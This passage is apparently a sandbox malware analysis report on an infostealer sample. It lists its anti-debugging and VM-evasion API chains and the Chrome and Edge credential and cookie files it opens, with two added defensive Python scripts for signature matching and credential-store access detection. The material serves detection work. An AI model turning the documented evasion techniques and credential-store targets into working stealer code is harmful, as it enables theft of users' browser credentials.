Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00401120 GetSystemInfo,ExitProcess, 0_2_00401120
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: DBFIDGII.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DBFIDGII.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: DBFIDGII.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: DBFIDGII.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DBFIDGII.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: DBFIDGII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DBFIDGII.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: DBFIDGII.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: DBFIDGII.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DBFIDGII.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`w
Source: DBFIDGII.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware^
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: DBFIDGII.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: DBFIDGII.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: DBFIDGII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: DBFIDGII.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: DBFIDGII.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: DBFIDGII.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: DBFIDGII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: DBFIDGII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: DBFIDGII.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B3E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416230
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00415DB0 mov eax, dword ptr fs:[00000030h] 0_2_00415DB0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C37B13 push dword ptr fs:[00000030h] 0_2_02C37B13
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD6017 mov eax, dword ptr fs:[00000030h] 0_2_02FD6017
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h] 0_2_02FC0D90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h] 0_2_02FC092B
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00419DB7 SetUnhandledExceptionFilter, 0_2_00419DB7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B3E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173CD
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_61EAF900
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD7634 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02FD7634
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FDA01E SetUnhandledExceptionFilter, 0_2_02FDA01E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD7DA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02FD7DA5

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00415CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415CF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD5F57 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_02FD5F57
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414560
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_02FD47C7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004143B0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143B0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004144A0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144A0
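The "Code function" lines in this report record, per function address, the ordered list of imported APIs the function calls; the sandbox derives signatures such as "Searches for specific processes" (CreateToolhelp32Snapshot → Process32Next → StrCmpCA) or "may stop execution after checking locale" (GetKeyboardLayoutList → GetLocaleInfoA) from those chains. The script below is an added example, not code from Joe Sandbox or from the report: it parses lines in this exact format and matches each chain against a small, hypothetical signature table so that an analyst can re-derive those verdicts from a report dump. The sample lines are copied from the report section above; the signature names are the author's own.

```python
"""Match API-call chains from Joe Sandbox 'Code function' lines against behavior signatures.

Added example; not code from Joe Sandbox or from the report. The SIGNATURES table is
hypothetical and only illustrates the chains flagged in the report section above.
"""
import re

# Joe Sandbox function identifier: <process>_<dump>_<hex address>, e.g. 0_2_00415CF0
ADDR = r"\d+_\d+_[0-9A-Fa-f]+"

# Line shape: "... Code function: [<addr> ]<api>,<api>,...,<api>, <addr>"
# The leading address is sometimes omitted (see the GetKeyboardLayoutList lines).
CODE_FUNCTION_RE = re.compile(
    rf"Code function:\s+(?:({ADDR})\s+)?(\S+),\s+({ADDR})\s*$"
)

# Hypothetical signatures: an ordered subsequence of APIs that must occur in the chain.
SIGNATURES = {
    "process_enumeration_by_name": [
        "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA",
    ],
    "keyboard_locale_check": ["GetKeyboardLayoutList", "GetLocaleInfoA"],
    "enumerate_copy_delete_files": [
        "FindFirstFileA", "CopyFileA", "DeleteFileA", "FindNextFileA",
    ],
    "http_download_to_memory": ["InternetOpenA", "InternetOpenUrlA", "InternetReadFile"],
}

# Constructed sample input: four lines copied from the report in its own format.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\FFAk2gixx5.exe Code function: 0_2_00415CF0 "
    "CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415CF0",
    "Source: C:\\Users\\user\\Desktop\\FFAk2gixx5.exe Code function: "
    "GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414560",
    "Source: C:\\Users\\user\\Desktop\\FFAk2gixx5.exe Code function: 0_2_0040B610 "
    "FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,"
    "StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,"
    "FindNextFileA,FindClose, 0_2_0040B610",
    "Source: C:\\Users\\user\\Desktop\\FFAk2gixx5.exe Code function: 0_2_00404C70 "
    "GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,"
    "InternetCloseHandle,InternetCloseHandle, 0_2_00404C70",
]


def parse_code_function(line):
    """Return (function_id, [api, ...]) for a 'Code function' line, else None."""
    m = CODE_FUNCTION_RE.search(line)
    if not m:
        return None
    leading, chain, trailing = m.groups()
    apis = [a for a in chain.split(",") if a]
    return (leading or trailing), apis


def contains_in_order(calls, pattern):
    """True if every API in pattern occurs in calls, in that order (gaps allowed)."""
    it = iter(calls)  # one shared iterator, so each match resumes after the previous one
    return all(any(call == wanted for call in it) for wanted in pattern)


def match_report(lines):
    """Map function id -> names of signatures whose pattern the function's chain contains."""
    hits = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue  # not a 'Code function' line (e.g. 'File opened:')
        func_id, apis = parsed
        matched = [name for name, pat in SIGNATURES.items() if contains_in_order(apis, pat)]
        if matched:
            hits[func_id] = matched
    return hits


if __name__ == "__main__":
    for func_id, names in match_report(SAMPLE_LINES).items():
        print(func_id, ", ".join(names))
```

Ordered-subsequence matching rather than exact-list matching is deliberate: the same routine appears at several addresses (0_2_00415CF0 and 0_2_02FD5F57 for the process walk, for instance, one in the original image and one in the unpacked copy), and the sandbox's chains for such duplicates differ only in interleaved helpers such as wsprintfA or lstrcat.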

Stealing of Sensitive Information

Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: Yara match File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
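The "File opened" entries above are the host-side footprint of the credential theft: a process that is neither chrome.exe nor msedge.exe opening Login Data, Web Data, Network\Cookies and History (plus the History-journal rollback file) under a Chromium profile. The detection below is an added example, not code from the report or from any EDR product; it assumes a hypothetical file-open telemetry feed with one event per line, "timestamp,process image path,target path", and raises an alert when the accessing image is not a browser binary installed under Program Files. The sample telemetry is constructed for the example, with paths modelled on the report's entries.

```python
"""Flag non-browser processes opening Chromium credential stores.

Added example; not code from the report, Joe Sandbox or any EDR vendor. It assumes a
hypothetical telemetry feed of '<timestamp>,<process image path>,<target path>' lines.
"""
import re

# Stores the report shows the sample opening: Login Data, Web Data, Network\Cookies,
# History, and their SQLite rollback journals (e.g. History-journal). Windows paths are
# case-insensitive, hence IGNORECASE. '[^\\]+' is the profile directory (Default, Profile 1, ...).
CREDENTIAL_STORE_RE = re.compile(
    r"\\(?:google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\"
    r"(?:network\\)?(cookies|login data|web data|history)(?:-journal)?$",
    re.IGNORECASE,
)

# Browser images allowed to touch their own profile. Both the install root and the
# path suffix are checked, so a renamed copy of chrome.exe in %TEMP% does not pass.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")
TRUSTED_IMAGES = (
    "\\google\\chrome\\application\\chrome.exe",
    "\\microsoft\\edge\\application\\msedge.exe",
)

# Constructed sample telemetry (timestamps and events are invented for this example).
SAMPLE_TELEMETRY = [
    r"2024-05-02T10:14:03Z,C:\Program Files\Google\Chrome\Application\chrome.exe,"
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"2024-05-02T10:14:07Z,C:\Users\user\Desktop\FFAk2gixx5.exe,"
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"2024-05-02T10:14:07Z,C:\Users\user\Desktop\FFAk2gixx5.exe,"
    r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    r"2024-05-02T10:14:08Z,C:\Users\user\AppData\Local\Temp\chrome.exe,"
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"2024-05-02T10:14:09Z,C:\Users\user\Desktop\FFAk2gixx5.exe,"
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions"
    r"\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css",
    r"2024-05-02T10:14:10Z,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,"
    r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History",
]


def is_trusted_browser(image):
    """True only for chrome.exe / msedge.exe living under their normal install roots."""
    img = image.lower()
    return img.startswith(TRUSTED_ROOTS) and img.endswith(TRUSTED_IMAGES)


def classify_event(line):
    """Return an alert dict for a suspicious credential-store access, else None."""
    parts = line.split(",", 2)  # the target path is the last field and may itself contain commas
    if len(parts) != 3:
        return None
    ts, image, target = parts
    m = CREDENTIAL_STORE_RE.search(target)
    if m is None or is_trusted_browser(image):
        return None
    return {"time": ts, "process": image, "path": target, "store": m.group(1)}


def detect(lines):
    """Run the rule over a telemetry feed and return the alerts in feed order."""
    return [alert for alert in map(classify_event, lines) if alert]


if __name__ == "__main__":
    for alert in detect(SAMPLE_TELEMETRY):
        print(alert["time"], alert["process"], "->", alert["store"])
```

The rule keys on the image path rather than the process name, because the cheapest bypass of a name-based allowlist is to drop a renamed binary called chrome.exe. A copy-then-read grabber still trips it: the copy is itself an open of the store by the stealer's image. The extension-directory access in the fifth sample line is deliberately not matched; extension folders are readable by many legitimate tools and would make the rule noisy, whereas the four store files are touched by almost nothing but the browser.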

Remote Access Functionality

Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E1307A sqlite3_transfer_bindings, 0_2_61E1307A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D5E6 sqlite3_bind_int64, 0_2_61E2D5E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D595 sqlite3_bind_double, 0_2_61E2D595
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E0B431 sqlite3_clear_bindings, 0_2_61E0B431
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E037F3 sqlite3_value_frombind, 0_2_61E037F3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64, 0_2_61E2D781
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D714 sqlite3_bind_zeroblob, 0_2_61E2D714
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D68C sqlite3_bind_pointer, 0_2_61E2D68C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D65B sqlite3_bind_null, 0_2_61E2D65B
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D635 sqlite3_bind_int, 0_2_61E2D635
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D9B0 sqlite3_bind_value, 0_2_61E2D9B0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D981 sqlite3_bind_text16, 0_2_61E2D981
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D945 sqlite3_bind_text64, 0_2_61E2D945
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D916 sqlite3_bind_text, 0_2_61E2D916
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D8E7 sqlite3_bind_blob64, 0_2_61E2D8E7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E038CA sqlite3_bind_parameter_count, 0_2_61E038CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E158CA sqlite3_bind_parameter_index, 0_2_61E158CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E038DC sqlite3_bind_parameter_name, 0_2_61E038DC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E2D8B8 sqlite3_bind_blob, 0_2_61E2D8B8